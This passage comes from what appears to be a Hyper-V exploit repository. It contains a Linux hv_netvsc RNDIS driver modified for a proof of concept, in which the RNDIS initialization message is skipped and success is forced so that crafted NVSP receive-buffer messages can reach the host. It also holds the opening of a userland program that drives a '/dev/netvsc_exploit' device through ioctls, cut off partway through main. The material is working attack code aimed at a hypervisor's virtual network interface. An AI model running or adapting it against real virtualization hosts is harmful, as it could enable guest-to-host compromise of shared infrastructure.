objsize %u, data size %u\n", 574 | caps->header.size, caps_len); 575 | return -EINVAL; 576 | } 577 | 578 | return 0; 579 | } 580 | 581 | int rndis_filter_query_device_mac(struct rndis_device *dev, 582 | struct netvsc_device *net_device) 583 | { 584 | u32 size = ETH_ALEN; 585 | 586 | return rndis_filter_query_device(dev, net_device, 587 | RNDIS_OID_802_3_PERMANENT_ADDRESS, 588 | dev->hw_mac_adr, &size); 589 | } 590 | 591 | #define NWADR_STR "NetworkAddress" 592 | #define NWADR_STRLEN 14 593 | 594 | int rndis_filter_set_device_mac(struct netvsc_device *nvdev, 595 | const char *mac) 596 | { 597 | struct rndis_device *rdev = nvdev->extension; 598 | struct rndis_request *request; 599 | struct rndis_set_request *set; 600 | struct rndis_config_parameter_info *cpi; 601 | wchar_t *cfg_nwadr, *cfg_mac; 602 | struct rndis_set_complete *set_complete; 603 | char macstr[2*ETH_ALEN+1]; 604 | u32 extlen = sizeof(struct rndis_config_parameter_info) + 605 | 2*NWADR_STRLEN + 4*ETH_ALEN; 606 | int ret; 607 | 608 | request = get_rndis_request(rdev, RNDIS_MSG_SET, 609 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen); 610 | if (!request) 611 | return -ENOMEM; 612 | 613 | set = &request->request_msg.msg.set_req; 614 | set->oid = RNDIS_OID_GEN_RNDIS_CONFIG_PARAMETER; 615 | set->info_buflen = extlen; 616 | set->info_buf_offset = sizeof(struct rndis_set_request); 617 | set->dev_vc_handle = 0; 618 | 619 | cpi = (struct rndis_config_parameter_info *)((ulong)set + 620 | set->info_buf_offset); 621 | cpi->parameter_name_offset = 622 | sizeof(struct rndis_config_parameter_info); 623 | /* Multiply by 2 because host needs 2 bytes (utf16) for each char */ 624 | cpi->parameter_name_length = 2*NWADR_STRLEN; 625 | cpi->parameter_type = RNDIS_CONFIG_PARAM_TYPE_STRING; 626 | cpi->parameter_value_offset = 627 | cpi->parameter_name_offset + cpi->parameter_name_length; 628 | /* Multiply by 4 because each MAC byte displayed as 2 utf16 chars */ 629 | cpi->parameter_value_length = 4*ETH_ALEN; 630 | 631 | 
cfg_nwadr = (wchar_t *)((ulong)cpi + cpi->parameter_name_offset); 632 | cfg_mac = (wchar_t *)((ulong)cpi + cpi->parameter_value_offset); 633 | ret = utf8s_to_utf16s(NWADR_STR, NWADR_STRLEN, UTF16_HOST_ENDIAN, 634 | cfg_nwadr, NWADR_STRLEN); 635 | if (ret < 0) 636 | goto cleanup; 637 | snprintf(macstr, 2*ETH_ALEN+1, "%pm", mac); 638 | ret = utf8s_to_utf16s(macstr, 2*ETH_ALEN, UTF16_HOST_ENDIAN, 639 | cfg_mac, 2*ETH_ALEN); 640 | if (ret < 0) 641 | goto cleanup; 642 | 643 | ret = rndis_filter_send_request(rdev, request); 644 | if (ret != 0) 645 | goto cleanup; 646 | 647 | wait_for_completion(&request->wait_event); 648 | 649 | set_complete = &request->response_msg.msg.set_complete; 650 | if (set_complete->status != RNDIS_STATUS_SUCCESS) 651 | ret = -EIO; 652 | 653 | cleanup: 654 | put_rndis_request(rdev, request); 655 | return ret; 656 | } 657 | 658 | static int 659 | rndis_filter_set_offload_params(struct net_device *ndev, 660 | struct netvsc_device *nvdev, 661 | struct ndis_offload_params *req_offloads) 662 | { 663 | struct rndis_device *rdev = nvdev->extension; 664 | struct rndis_request *request; 665 | struct rndis_set_request *set; 666 | struct ndis_offload_params *offload_params; 667 | struct rndis_set_complete *set_complete; 668 | u32 extlen = sizeof(struct ndis_offload_params); 669 | int ret; 670 | u32 vsp_version = nvdev->nvsp_version; 671 | 672 | if (vsp_version <= NVSP_PROTOCOL_VERSION_4) { 673 | extlen = VERSION_4_OFFLOAD_SIZE; 674 | /* On NVSP_PROTOCOL_VERSION_4 and below, we do not support 675 | * UDP checksum offload. 676 | */ 677 | req_offloads->udp_ip_v4_csum = 0; 678 | req_offloads->udp_ip_v6_csum = 0; 679 | } 680 | 681 | request = get_rndis_request(rdev, RNDIS_MSG_SET, 682 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen); 683 | if (!request) 684 | return -ENOMEM; 685 | 686 | set = &request->request_msg.msg.set_req; 687 | set->oid = OID_TCP_OFFLOAD_PARAMETERS; 688 | set->info_buflen = extlen; 689 | set->info_buf_offset = sizeof(struct rndis_set_request); 690 | set->dev_vc_handle = 0; 691 | 692 | offload_params = (struct ndis_offload_params *)((ulong)set + 693 | set->info_buf_offset); 694 | *offload_params = *req_offloads; 695 | offload_params->header.type = NDIS_OBJECT_TYPE_DEFAULT; 696 | offload_params->header.revision = NDIS_OFFLOAD_PARAMETERS_REVISION_3; 697 | offload_params->header.size = extlen; 698 | 699 | ret = rndis_filter_send_request(rdev, request); 700 | if (ret != 0) 701 | goto cleanup; 702 | 703 | wait_for_completion(&request->wait_event); 704 | set_complete = &request->response_msg.msg.set_complete; 705 | if (set_complete->status != RNDIS_STATUS_SUCCESS) { 706 | netdev_err(ndev, "Fail to set offload on host side:0x%x\n", 707 | set_complete->status); 708 | ret = -EINVAL; 709 | } 710 | 711 | cleanup: 712 | put_rndis_request(rdev, request); 713 | return ret; 714 | } 715 | 716 | int rndis_filter_set_rss_param(struct rndis_device *rdev, 717 | const u8 *rss_key) 718 | { 719 | struct net_device *ndev = rdev->ndev; 720 | struct rndis_request *request; 721 | struct rndis_set_request *set; 722 | struct rndis_set_complete *set_complete; 723 | u32 extlen = sizeof(struct ndis_recv_scale_param) + 724 | 4 * ITAB_NUM + NETVSC_HASH_KEYLEN; 725 | struct ndis_recv_scale_param *rssp; 726 | u32 *itab; 727 | u8 *keyp; 728 | int i, ret; 729 | 730 | request = get_rndis_request( 731 | rdev, RNDIS_MSG_SET, 732 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen); 733 | if (!request) 734 | return -ENOMEM; 735 | 736 | set = &request->request_msg.msg.set_req; 737 | set->oid = 
OID_GEN_RECEIVE_SCALE_PARAMETERS; 738 | set->info_buflen = extlen; 739 | set->info_buf_offset = sizeof(struct rndis_set_request); 740 | set->dev_vc_handle = 0; 741 | 742 | rssp = (struct ndis_recv_scale_param *)(set + 1); 743 | rssp->hdr.type = NDIS_OBJECT_TYPE_RSS_PARAMETERS; 744 | rssp->hdr.rev = NDIS_RECEIVE_SCALE_PARAMETERS_REVISION_2; 745 | rssp->hdr.size = sizeof(struct ndis_recv_scale_param); 746 | rssp->flag = 0; 747 | rssp->hashinfo = NDIS_HASH_FUNC_TOEPLITZ | NDIS_HASH_IPV4 | 748 | NDIS_HASH_TCP_IPV4 | NDIS_HASH_IPV6 | 749 | NDIS_HASH_TCP_IPV6; 750 | rssp->indirect_tabsize = 4*ITAB_NUM; 751 | rssp->indirect_taboffset = sizeof(struct ndis_recv_scale_param); 752 | rssp->hashkey_size = NETVSC_HASH_KEYLEN; 753 | rssp->kashkey_offset = rssp->indirect_taboffset + 754 | rssp->indirect_tabsize; 755 | 756 | /* Set indirection table entries */ 757 | itab = (u32 *)(rssp + 1); 758 | for (i = 0; i < ITAB_NUM; i++) 759 | itab[i] = rdev->ind_table[i]; 760 | 761 | /* Set hask key values */ 762 | keyp = (u8 *)((unsigned long)rssp + rssp->kashkey_offset); 763 | memcpy(keyp, rss_key, NETVSC_HASH_KEYLEN); 764 | 765 | ret = rndis_filter_send_request(rdev, request); 766 | if (ret != 0) 767 | goto cleanup; 768 | 769 | wait_for_completion(&request->wait_event); 770 | set_complete = &request->response_msg.msg.set_complete; 771 | if (set_complete->status == RNDIS_STATUS_SUCCESS) 772 | memcpy(rdev->rss_key, rss_key, NETVSC_HASH_KEYLEN); 773 | else { 774 | netdev_err(ndev, "Fail to set RSS parameters:0x%x\n", 775 | set_complete->status); 776 | ret = -EINVAL; 777 | } 778 | 779 | cleanup: 780 | put_rndis_request(rdev, request); 781 | return ret; 782 | } 783 | 784 | static int rndis_filter_query_device_link_status(struct rndis_device *dev, 785 | struct netvsc_device *net_device) 786 | { 787 | u32 size = sizeof(u32); 788 | u32 link_status; 789 | 790 | return rndis_filter_query_device(dev, net_device, 791 | RNDIS_OID_GEN_MEDIA_CONNECT_STATUS, 792 | &link_status, &size); 793 | } 794 | 795 | static int rndis_filter_query_link_speed(struct rndis_device *dev, 796 | struct netvsc_device *net_device) 797 | { 798 | u32 size = sizeof(u32); 799 | u32 link_speed; 800 | struct net_device_context *ndc; 801 | int ret; 802 | 803 | ret = rndis_filter_query_device(dev, net_device, 804 | RNDIS_OID_GEN_LINK_SPEED, 805 | &link_speed, &size); 806 | 807 | if (!ret) { 808 | ndc = netdev_priv(dev->ndev); 809 | 810 | /* The link speed reported from host is in 100bps unit, so 811 | * we convert it to Mbps here. 
812 | */
813 | ndc->speed = link_speed / 10000;
814 | }
815 |
816 | return ret;
817 | }
818 |
819 | static int rndis_filter_set_packet_filter(struct rndis_device *dev,
820 | u32 new_filter)
821 | {
822 | struct rndis_request *request;
823 | struct rndis_set_request *set;
824 | int ret;
825 |
826 | request = get_rndis_request(dev, RNDIS_MSG_SET,
827 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) +
828 | sizeof(u32));
829 | if (!request)
830 | return -ENOMEM;
831 |
832 |
833 | /* Setup the rndis set */
834 | set = &request->request_msg.msg.set_req;
835 | set->oid = RNDIS_OID_GEN_CURRENT_PACKET_FILTER;
836 | set->info_buflen = sizeof(u32);
837 | set->info_buf_offset = sizeof(struct rndis_set_request);
838 |
839 | memcpy((void *)(unsigned long)set + sizeof(struct rndis_set_request),
840 | &new_filter, sizeof(u32));
841 |
842 | ret = rndis_filter_send_request(dev, request);
843 | if (ret == 0)
844 | wait_for_completion(&request->wait_event);
845 |
846 | put_rndis_request(dev, request);
847 |
848 | return ret;
849 | }
850 |
851 | static void rndis_set_multicast(struct work_struct *w)
852 | {
853 | struct rndis_device *rdev
854 | = container_of(w, struct rndis_device, mcast_work);
855 |
856 | if (rdev->ndev->flags & IFF_PROMISC)
857 | rndis_filter_set_packet_filter(rdev,
858 | NDIS_PACKET_TYPE_PROMISCUOUS);
859 | else
860 | rndis_filter_set_packet_filter(rdev,
861 | NDIS_PACKET_TYPE_BROADCAST |
862 | NDIS_PACKET_TYPE_ALL_MULTICAST |
863 | NDIS_PACKET_TYPE_DIRECTED);
864 | }
865 |
866 | void rndis_filter_update(struct netvsc_device *nvdev)
867 | {
868 | struct rndis_device *rdev = nvdev->extension;
869 |
870 | schedule_work(&rdev->mcast_work);
871 | }
872 |
873 | static int rndis_filter_init_device(struct rndis_device *dev,
874 | struct netvsc_device *nvdev)
875 | {
876 | struct rndis_request *request;
877 | struct rndis_initialize_request *init;
878 | struct rndis_initialize_complete *init_complete;
879 | u32 status;
880 | int ret;
881 |
882 | request = get_rndis_request(dev, RNDIS_MSG_INIT,
883 | RNDIS_MESSAGE_SIZE(struct rndis_initialize_request));
884 | if (!request) {
885 | ret = -ENOMEM;
886 | goto cleanup;
887 | }
888 |
889 | /* Setup the rndis init request */
890 | init = &request->request_msg.msg.init_req;
891 | init->major_ver = RNDIS_MAJOR_VERSION;
892 | init->minor_ver = RNDIS_MINOR_VERSION;
893 | init->max_xfer_size = 0x4000;
894 |
895 | dev->state = RNDIS_DEV_INITIALIZING;
896 |
897 | /*
898 | * PoC change: in order to send NVSP_MSG1_TYPE_SEND_RECV_BUF we need to
899 | * skip sending the RNDIS_MSG_INIT message here.
900 | */
901 |
902 | /*ret = rndis_filter_send_request(dev, request);
903 | if (ret != 0) {
904 | dev->state = RNDIS_DEV_UNINITIALIZED;
905 | goto cleanup;
906 | }*/
907 |
908 | //wait_for_completion(&request->wait_event);
909 |
910 | init_complete = &request->response_msg.msg.init_complete;
911 | status = init_complete->status;
912 | status = RNDIS_STATUS_SUCCESS; /* forced: no RNDIS_MSG_INIT was actually sent */
913 | if (status == RNDIS_STATUS_SUCCESS) {
914 | dev->state = RNDIS_DEV_INITIALIZED;
915 | nvdev->max_pkt = RNDIS_MAX_PKT_DEFAULT;
916 | nvdev->pkt_align = RNDIS_PKT_ALIGN_DEFAULT;
917 | //printk("[*]hv_netvsc:max_pkt:%d pkt_align:%d\n", nvdev->max_pkt, nvdev->pkt_align);
918 | ret = 0;
919 | } else {
920 | dev->state = RNDIS_DEV_UNINITIALIZED;
921 | ret = -EINVAL;
922 | }
923 |
924 | cleanup:
925 | if (request)
926 | put_rndis_request(dev, request);
927 |
928 | return ret;
929 | }
930 |
931 | static bool netvsc_device_idle(const struct netvsc_device *nvdev)
932 | {
933 | int i;
934 |
935 | for (i = 0; i < nvdev->num_chn; i++) {
936 | const struct
netvsc_channel *nvchan = &nvdev->chan_table[i]; 937 | 938 | if (nvchan->mrc.first != nvchan->mrc.next) 939 | return false; 940 | 941 | if (atomic_read(&nvchan->queue_sends) > 0) 942 | return false; 943 | } 944 | 945 | return true; 946 | } 947 | 948 | static void rndis_filter_halt_device(struct rndis_device *dev) 949 | { 950 | struct rndis_request *request; 951 | struct rndis_halt_request *halt; 952 | struct net_device_context *net_device_ctx = netdev_priv(dev->ndev); 953 | struct netvsc_device *nvdev = rtnl_dereference(net_device_ctx->nvdev); 954 | 955 | /* Attempt to do a rndis device halt */ 956 | request = get_rndis_request(dev, RNDIS_MSG_HALT, 957 | RNDIS_MESSAGE_SIZE(struct rndis_halt_request)); 958 | if (!request) 959 | goto cleanup; 960 | 961 | /* Setup the rndis set */ 962 | halt = &request->request_msg.msg.halt_req; 963 | halt->req_id = atomic_inc_return(&dev->new_req_id); 964 | 965 | /* Ignore return since this msg is optional. */ 966 | rndis_filter_send_request(dev, request); 967 | 968 | dev->state = RNDIS_DEV_UNINITIALIZED; 969 | 970 | cleanup: 971 | nvdev->destroy = true; 972 | 973 | /* Force flag to be ordered before waiting */ 974 | wmb(); 975 | 976 | /* Wait for all send completions */ 977 | wait_event(nvdev->wait_drain, netvsc_device_idle(nvdev)); 978 | 979 | if (request) 980 | put_rndis_request(dev, request); 981 | } 982 | 983 | static int rndis_filter_open_device(struct rndis_device *dev) 984 | { 985 | int ret; 986 | 987 | if (dev->state != RNDIS_DEV_INITIALIZED) 988 | return 0; 989 | 990 | ret = rndis_filter_set_packet_filter(dev, 991 | NDIS_PACKET_TYPE_BROADCAST | 992 | NDIS_PACKET_TYPE_ALL_MULTICAST | 993 | NDIS_PACKET_TYPE_DIRECTED); 994 | if (ret == 0) 995 | dev->state = RNDIS_DEV_DATAINITIALIZED; 996 | 997 | return ret; 998 | } 999 | 1000 | static int rndis_filter_close_device(struct rndis_device *dev) 1001 | { 1002 | int ret; 1003 | 1004 | if (dev->state != RNDIS_DEV_DATAINITIALIZED) 1005 | return 0; 1006 | 1007 | /* Make sure rndis_set_multicast doesn't re-enable filter! */ 1008 | cancel_work_sync(&dev->mcast_work); 1009 | 1010 | ret = rndis_filter_set_packet_filter(dev, 0); 1011 | if (ret == -ENODEV) 1012 | ret = 0; 1013 | 1014 | if (ret == 0) 1015 | dev->state = RNDIS_DEV_INITIALIZED; 1016 | 1017 | return ret; 1018 | } 1019 | 1020 | static void netvsc_sc_open(struct vmbus_channel *new_sc) 1021 | { 1022 | struct net_device *ndev = 1023 | hv_get_drvdata(new_sc->primary_channel->device_obj); 1024 | struct net_device_context *ndev_ctx = netdev_priv(ndev); 1025 | struct netvsc_device *nvscdev; 1026 | u16 chn_index = new_sc->offermsg.offer.sub_channel_index; 1027 | struct netvsc_channel *nvchan; 1028 | int ret; 1029 | 1030 | /* This is safe because this callback only happens when 1031 | * new device is being setup and waiting on the channel_init_wait. 
1032 | */
1033 | nvscdev = rcu_dereference_raw(ndev_ctx->nvdev);
1034 | if (!nvscdev || chn_index >= nvscdev->num_chn)
1035 | return;
1036 |
1037 | nvchan = nvscdev->chan_table + chn_index;
1038 |
1039 | /* Because the device uses NAPI, all the interrupt batching and
1040 | * control is done via Net softirq, not the channel handling
1041 | */
1042 | set_channel_read_mode(new_sc, HV_CALL_ISR);
1043 |
1044 | /* Set the channel before opening.*/
1045 | nvchan->channel = new_sc;
1046 | printk("[*]hv_netvsc netvsc_sc_open channel: %p\n", new_sc);
1047 | ret = vmbus_open(new_sc, nvscdev->ring_size * PAGE_SIZE,
1048 | nvscdev->ring_size * PAGE_SIZE, NULL, 0,
1049 | netvsc_channel_cb, nvchan);
1050 | if (ret == 0)
1051 | napi_enable(&nvchan->napi);
1052 | else
1053 | netdev_notice(ndev, "sub channel open failed: %d\n", ret);
1054 |
1055 | if (atomic_inc_return(&nvscdev->open_chn) == nvscdev->num_chn)
1056 | wake_up(&nvscdev->subchan_open);
1057 | }
1058 |
1059 | /* Open sub-channels after completing the handling of the device probe.
1060 | * This breaks overlap of processing the host message for the
1061 | * new primary channel with the initialization of sub-channels.
1062 | */
1063 | void rndis_set_subchannel(struct work_struct *w)
1064 | {
1065 | struct netvsc_device *nvdev
1066 | = container_of(w, struct netvsc_device, subchan_work);
1067 | struct nvsp_message *init_packet = &nvdev->channel_init_pkt;
1068 | struct net_device_context *ndev_ctx;
1069 | struct rndis_device *rdev;
1070 | struct net_device *ndev;
1071 | struct hv_device *hv_dev;
1072 | int i, ret;
1073 |
1074 | if (!rtnl_trylock()) {
1075 | schedule_work(w);
1076 | return;
1077 | }
1078 |
1079 | rdev = nvdev->extension;
1080 | if (!rdev)
1081 | goto unlock; /* device was removed */
1082 |
1083 | ndev = rdev->ndev;
1084 | ndev_ctx = netdev_priv(ndev);
1085 | hv_dev = ndev_ctx->device_ctx;
1086 |
1087 | memset(init_packet, 0, sizeof(struct nvsp_message));
1088 | init_packet->hdr.msg_type = NVSP_MSG5_TYPE_SUBCHANNEL;
1089 | init_packet->msg.v5_msg.subchn_req.op = NVSP_SUBCHANNEL_ALLOCATE;
1090 | init_packet->msg.v5_msg.subchn_req.num_subchannels =
1091 | nvdev->num_chn - 1;
1092 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG5_TYPE_SUBCHANNEL\n");
1093 | ret = vmbus_sendpacket(hv_dev->channel, init_packet,
1094 | sizeof(struct nvsp_message),
1095 | (unsigned long)init_packet,
1096 | VM_PKT_DATA_INBAND,
1097 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED);
1098 | if (ret) {
1099 | netdev_err(ndev, "sub channel allocate send failed: %d\n", ret);
1100 | goto failed;
1101 | }
1102 |
1103 | wait_for_completion(&nvdev->channel_init_wait);
1104 | if (init_packet->msg.v5_msg.subchn_comp.status != NVSP_STAT_SUCCESS) {
1105 | netdev_err(ndev, "sub channel request failed\n");
1106 | goto failed;
1107 | }
1108 |
1109 | nvdev->num_chn = 1 +
1110 | init_packet->msg.v5_msg.subchn_comp.num_subchannels;
1111 |
1112 | /* wait for all sub channels to open */
1113 | wait_event(nvdev->subchan_open,
1114 | atomic_read(&nvdev->open_chn) == nvdev->num_chn);
1115 |
1116 | /* ignore failures from setting rss parameters, still have channels */
1117 | rndis_filter_set_rss_param(rdev, netvsc_hash_key);
1118 |
1119 | netif_set_real_num_tx_queues(ndev, nvdev->num_chn);
1120 | netif_set_real_num_rx_queues(ndev, nvdev->num_chn);
1121 |
1122 | rtnl_unlock();
1123 | return;
1124 |
1125 | failed:
1126 | /* fallback to only primary channel */
1127 | for (i = 1; i < nvdev->num_chn; i++)
1128 | netif_napi_del(&nvdev->chan_table[i].napi);
1129 |
1130 | nvdev->max_chn =
1; 1131 | nvdev->num_chn = 1; 1132 | unlock: 1133 | rtnl_unlock(); 1134 | } 1135 | 1136 | struct netvsc_device *rndis_filter_device_add(struct hv_device *dev, 1137 | struct netvsc_device_info *device_info) 1138 | { 1139 | struct net_device *net = hv_get_drvdata(dev); 1140 | struct net_device_context *net_device_ctx = netdev_priv(net); 1141 | struct netvsc_device *net_device; 1142 | struct rndis_device *rndis_device; 1143 | struct ndis_offload hwcaps; 1144 | struct ndis_offload_params offloads; 1145 | struct ndis_recv_scale_cap rsscap; 1146 | u32 rsscap_size = sizeof(struct ndis_recv_scale_cap); 1147 | unsigned int gso_max_size = GSO_MAX_SIZE; 1148 | u32 mtu, size; 1149 | const struct cpumask *node_cpu_mask; 1150 | u32 num_possible_rss_qs; 1151 | int i, ret; 1152 | 1153 | rndis_device = get_rndis_device(); 1154 | if (!rndis_device) 1155 | return ERR_PTR(-ENODEV); 1156 | 1157 | /* 1158 | * Let the inner driver handle this first to create the netvsc channel 1159 | * NOTE! Once the channel is created, we may get a receive callback 1160 | * (RndisFilterOnReceive()) before this call is completed 1161 | */ 1162 | net_device = netvsc_device_add(dev, device_info); 1163 | if (IS_ERR(net_device)) { 1164 | kfree(rndis_device); 1165 | return net_device; 1166 | } 1167 | 1168 | /* Initialize the rndis device */ 1169 | net_device->max_chn = 1; 1170 | net_device->num_chn = 1; 1171 | 1172 | net_device->extension = rndis_device; 1173 | rndis_device->ndev = net; 1174 | 1175 | 1176 | /* Send the rndis initialization message */ 1177 | 1178 | ret = rndis_filter_init_device(rndis_device, net_device); 1179 | if (ret != 0) 1180 | goto err_dev_remv; 1181 | 1182 | 1183 | /* Get the MTU from the host */ 1184 | size = sizeof(u32); 1185 | ret = rndis_filter_query_device(rndis_device, net_device, 1186 | RNDIS_OID_GEN_MAXIMUM_FRAME_SIZE, 1187 | &mtu, &size); 1188 | if (ret == 0 && size == sizeof(u32) && mtu < net->mtu) 1189 | net->mtu = mtu; 1190 | 1191 | /* Get the mac address */ 1192 | ret = rndis_filter_query_device_mac(rndis_device, net_device); 1193 | if (ret != 0) 1194 | goto err_dev_remv; 1195 | 1196 | memcpy(device_info->mac_adr, rndis_device->hw_mac_adr, ETH_ALEN); 1197 | 1198 | /* Find HW offload capabilities */ 1199 | ret = rndis_query_hwcaps(rndis_device, net_device, &hwcaps); 1200 | if (ret != 0) 1201 | goto err_dev_remv; 1202 | 1203 | /* A value of zero means "no change"; now turn on what we want. 
*/ 1204 | memset(&offloads, 0, sizeof(struct ndis_offload_params)); 1205 | 1206 | /* Linux does not care about IP checksum, always does in kernel */ 1207 | offloads.ip_v4_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_DISABLED; 1208 | 1209 | /* Compute tx offload settings based on hw capabilities */ 1210 | net->hw_features = NETIF_F_RXCSUM; 1211 | 1212 | if ((hwcaps.csum.ip4_txcsum & NDIS_TXCSUM_ALL_TCP4) == NDIS_TXCSUM_ALL_TCP4) { 1213 | /* Can checksum TCP */ 1214 | net->hw_features |= NETIF_F_IP_CSUM; 1215 | net_device_ctx->tx_checksum_mask |= TRANSPORT_INFO_IPV4_TCP; 1216 | 1217 | offloads.tcp_ip_v4_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED; 1218 | 1219 | if (hwcaps.lsov2.ip4_encap & NDIS_OFFLOAD_ENCAP_8023) { 1220 | offloads.lso_v2_ipv4 = NDIS_OFFLOAD_PARAMETERS_LSOV2_ENABLED; 1221 | net->hw_features |= NETIF_F_TSO; 1222 | 1223 | if (hwcaps.lsov2.ip4_maxsz < gso_max_size) 1224 | gso_max_size = hwcaps.lsov2.ip4_maxsz; 1225 | } 1226 | 1227 | if (hwcaps.csum.ip4_txcsum & NDIS_TXCSUM_CAP_UDP4) { 1228 | offloads.udp_ip_v4_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED; 1229 | net_device_ctx->tx_checksum_mask |= TRANSPORT_INFO_IPV4_UDP; 1230 | } 1231 | } 1232 | 1233 | if ((hwcaps.csum.ip6_txcsum & NDIS_TXCSUM_ALL_TCP6) == NDIS_TXCSUM_ALL_TCP6) { 1234 | net->hw_features |= NETIF_F_IPV6_CSUM; 1235 | 1236 | offloads.tcp_ip_v6_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED; 1237 | net_device_ctx->tx_checksum_mask |= TRANSPORT_INFO_IPV6_TCP; 1238 | 1239 | if ((hwcaps.lsov2.ip6_encap & NDIS_OFFLOAD_ENCAP_8023) && 1240 | (hwcaps.lsov2.ip6_opts & NDIS_LSOV2_CAP_IP6) == NDIS_LSOV2_CAP_IP6) { 1241 | offloads.lso_v2_ipv6 = NDIS_OFFLOAD_PARAMETERS_LSOV2_ENABLED; 1242 | net->hw_features |= NETIF_F_TSO6; 1243 | 1244 | if (hwcaps.lsov2.ip6_maxsz < gso_max_size) 1245 | gso_max_size = hwcaps.lsov2.ip6_maxsz; 1246 | } 1247 | 1248 | if (hwcaps.csum.ip6_txcsum & NDIS_TXCSUM_CAP_UDP6) { 1249 | offloads.udp_ip_v6_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED; 1250 | net_device_ctx->tx_checksum_mask |= TRANSPORT_INFO_IPV6_UDP; 1251 | } 1252 | } 1253 | 1254 | netif_set_gso_max_size(net, gso_max_size); 1255 | 1256 | ret = rndis_filter_set_offload_params(net, net_device, &offloads); 1257 | if (ret) 1258 | goto err_dev_remv; 1259 | 1260 | rndis_filter_query_device_link_status(rndis_device, net_device); 1261 | 1262 | netdev_dbg(net, "Device MAC %pM link state %s\n", 1263 | rndis_device->hw_mac_adr, 1264 | rndis_device->link_state ? "down" : "up"); 1265 | 1266 | if (net_device->nvsp_version < NVSP_PROTOCOL_VERSION_5) 1267 | return net_device; 1268 | 1269 | rndis_filter_query_link_speed(rndis_device, net_device); 1270 | 1271 | /* vRSS setup */ 1272 | memset(&rsscap, 0, rsscap_size); 1273 | ret = rndis_filter_query_device(rndis_device, net_device, 1274 | OID_GEN_RECEIVE_SCALE_CAPABILITIES, 1275 | &rsscap, &rsscap_size); 1276 | if (ret || rsscap.num_recv_que < 2) 1277 | goto out; 1278 | 1279 | /* 1280 | * We will limit the VRSS channels to the number CPUs in the NUMA node 1281 | * the primary channel is currently bound to. 1282 | * 1283 | * This also guarantees that num_possible_rss_qs <= num_online_cpus 1284 | */ 1285 | node_cpu_mask = cpumask_of_node(cpu_to_node(dev->channel->target_cpu)); 1286 | num_possible_rss_qs = min_t(u32, cpumask_weight(node_cpu_mask), 1287 | rsscap.num_recv_que); 1288 | 1289 | net_device->max_chn = min_t(u32, VRSS_CHANNEL_MAX, num_possible_rss_qs); 1290 | 1291 | /* We will use the given number of channels if available. 
*/
1292 | net_device->num_chn = min(net_device->max_chn, device_info->num_chn);
1293 |
1294 | for (i = 0; i < ITAB_NUM; i++)
1295 | rndis_device->ind_table[i] = ethtool_rxfh_indir_default(i,
1296 | net_device->num_chn);
1297 |
1298 | atomic_set(&net_device->open_chn, 1);
1299 | vmbus_set_sc_create_callback(dev->channel, netvsc_sc_open);
1300 |
1301 | for (i = 1; i < net_device->num_chn; i++) {
1302 | ret = netvsc_alloc_recv_comp_ring(net_device, i);
1303 | if (ret) {
1304 | while (--i != 0)
1305 | vfree(net_device->chan_table[i].mrc.slots);
1306 | goto out;
1307 | }
1308 | }
1309 |
1310 | for (i = 1; i < net_device->num_chn; i++)
1311 | netif_napi_add(net, &net_device->chan_table[i].napi,
1312 | netvsc_poll, NAPI_POLL_WEIGHT);
1313 |
1314 | if (net_device->num_chn > 1)
1315 | schedule_work(&net_device->subchan_work);
1316 |
1317 | out:
1318 | /* if unavailable, just proceed with one queue */
1319 | if (ret) {
1320 | net_device->max_chn = 1;
1321 | net_device->num_chn = 1;
1322 | }
1323 |
1324 | return net_device;
1325 |
1326 | err_dev_remv:
1327 | rndis_filter_device_remove(dev, net_device);
1328 | return ERR_PTR(ret);
1329 | }
1330 |
1331 | void rndis_filter_device_remove(struct hv_device *dev,
1332 | struct netvsc_device *net_dev)
1333 | {
1334 | struct rndis_device *rndis_dev = net_dev->extension;
1335 |
1336 | /* Halt and release the rndis device */
1337 | rndis_filter_halt_device(rndis_dev);
1338 |
1339 | net_dev->extension = NULL;
1340 |
1341 | netvsc_device_remove(dev);
1342 | kfree(rndis_dev);
1343 | }
1344 |
1345 | int rndis_filter_open(struct netvsc_device *nvdev)
1346 | {
1347 | if (!nvdev)
1348 | return -EINVAL;
1349 |
1350 | if (atomic_inc_return(&nvdev->open_cnt) != 1)
1351 | return 0;
1352 |
1353 | return rndis_filter_open_device(nvdev->extension);
1354 | }
1355 |
1356 | int rndis_filter_close(struct netvsc_device *nvdev)
1357 | {
1358 | if (!nvdev)
1359 | return -EINVAL;
1360 |
1361 | if (atomic_dec_return(&nvdev->open_cnt) != 0)
1362 | return 0;
1363 |
1364 | return rndis_filter_close_device(nvdev->extension);
1365 | }
1366 |
1367 | bool rndis_filter_opened(const struct netvsc_device *nvdev)
1368 | {
1369 | return atomic_read(&nvdev->open_cnt) > 0;
1370 | }
1371 |
--------------------------------------------------------------------------------
/ring3/hyper_v:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/4B5F5F4B/HyperV/b1fba46337217abc9280dbd374e3b4e7ee6ce17b/ring3/hyper_v
--------------------------------------------------------------------------------
/ring3/hyper_v.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <string.h>
3 | #include <fcntl.h>
4 | #include <sys/ioctl.h>
5 | #include "hyper_v.h"
6 | #include <unistd.h>
7 |
8 | #define HYPERV_NETVSC_DEV_NAME "/dev/netvsc_exploit"
9 |
10 | typedef unsigned int u32;
11 | typedef _Bool bool;
12 |
13 | int main()
14 | {
15 | char buf[256];
16 | bool block;
17 | int ret;
18 | int fd = open(HYPERV_NETVSC_DEV_NAME, O_RDWR);
19 | if(-1 == fd)
20 | {
21 | perror("[*]open netvsc_exploit fail.");
22 | goto __EXIT;
23 | }
24 |
25 | memset(buf, 0, sizeof(buf));
26 |
27 | unsigned int recv_buf_size = 0x4B * 0x1000;
28 |
29 |
30 |
31 | /*printf("[*]hyper_v: send first rndis query.\n");
32 | ret = ioctl(fd, HYPERV_IOCTL_SEND_RNDIS_PKT_QUERY, &recv_buf_size, sizeof(recv_buf_size));
33 | if(0 != ret)
34 | {
35 | perror("[*]hyper_v send rndis query fail.");
